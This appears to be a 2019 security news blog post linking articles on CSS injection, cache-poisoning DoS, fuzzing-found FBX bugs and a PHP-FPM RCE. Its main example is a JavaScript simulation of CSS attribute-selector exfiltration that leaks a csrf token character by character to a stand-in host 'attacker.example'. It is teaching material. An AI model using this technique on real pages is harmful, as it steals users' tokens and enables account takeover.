by Bill Sempf
27. October 2019 08:28
Here's an interesting article on CSS injection primitives: ways to leak page content (attribute values such as tokens) through a Cross-Site Scripting injection point where you can land CSS but not JavaScript.
https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
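As an added illustration of the primitive that post is built on (this is my own example, not code from the linked article), the block below simulates the attribute-selector leak offline: the attacker emits one CSS rule per candidate character, only the rule whose `value^=` prefix matches the hidden token causes a background fetch, and the collector reads the leaked prefix back out of the request URL. The token alphabet, the collector host `attacker.example`, the `csrf` input name and the stand-in "browser" are all constructed assumptions.

```javascript
// Added example: simulate the CSS attribute-selector exfiltration primitive
// that CSS injection uses in place of JavaScript. The attacker host, the token
// value and the "victim page" are constructed for illustration only.

const CHARSET = "0123456789abcdef"; // assumed token alphabet (hex)
const LEAK_HOST = "https://attacker.example/leak"; // hypothetical collector

// Build one CSS rule per candidate next character. A rule only matches when the
// input's value starts with knownPrefix + c, so at most one background URL is
// fetched, and that fetch is the leak.
function buildProbeStylesheet(knownPrefix, charset = CHARSET) {
  return charset
    .split("")
    .map((c) => {
      const guess = knownPrefix + c;
      return `input[name="csrf"][value^="${guess}"]{background:url(${LEAK_HOST}?p=${encodeURIComponent(guess)})}`;
    })
    .join("\n");
}

// Minimal stand-in for the browser: the "page" is just the token sitting in the
// csrf input, and the only selector semantics emulated are
// input[name="csrf"][value^="..."]. Returns the URL the browser would fetch,
// or null when no rule matches (e.g. a character outside the charset).
function simulateVictim(stylesheet, tokenValue) {
  const rule = /input\[name="csrf"\]\[value\^="([^"]*)"\]\{background:url\(([^)]*)\)\}/g;
  let m;
  while ((m = rule.exec(stylesheet)) !== null) {
    const [, prefix, url] = m;
    if (tokenValue.startsWith(prefix)) return url;
  }
  return null;
}

// Collector side: recover the leaked prefix from the request the browser made.
function prefixFromLeakUrl(url) {
  return new URL(url).searchParams.get("p");
}

// Attacker loop: after each leaked character, inject a fresh stylesheet that
// probes the next position. Stops early instead of guessing when a character
// is not in the assumed alphabet.
function exfiltrateToken(tokenValue, tokenLength, charset = CHARSET) {
  let known = "";
  for (let i = 0; i < tokenLength; i++) {
    const css = buildProbeStylesheet(known, charset);
    const hit = simulateVictim(css, tokenValue);
    if (hit === null) break;
    known = prefixFromLeakUrl(hit);
  }
  return known;
}

// Stand-alone run with a constructed token.
console.log(exfiltrateToken("deadbeef", 8));
```

The loop re-injects a new stylesheet for every character; in a real page that re-injection is the hard part (the linked post covers the tricks for it), and the defensive takeaway is the same as for any injection: treat a CSS sink as a leak of everything the DOM holds, not as a cosmetic issue.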
Timely history lesson on the gradual movement of web applications from primarily server-side to primarily client-side code:
https://medium.com/young-coder/an-illustrated-beginners-guide-to-server-side-and-client-side-code-723cbb1db9ea
This isn't as new an idea as the authors would like us to believe, but it is a good PoC of the CDN-related cache-poisoning denial-of-service attack:
https://thehackernews.com/2019/10/cdn-cache-poisoning-dos-attack.html?m=1
Public disclosure of two DoS bugs in Autodesk's FBX library found by binary fuzzing (one still unpatched at the time of writing). A good way to get a look into this kind of testing: read the breakdowns of the CVEs.
https://fuzzit.dev/2019/10/25/discovery-and-analysis-of-2-dos-vulnerabilities-in-autodesk-fbx-1-unpatched/
PHP-FPM has a remote code execution vector when run behind nginx with a common configuration; patch if you can! Worth a read for the process as well.
https://thehackernews.com/2019/10/nginx-php-fpm-hacking.html
That's the news, folks.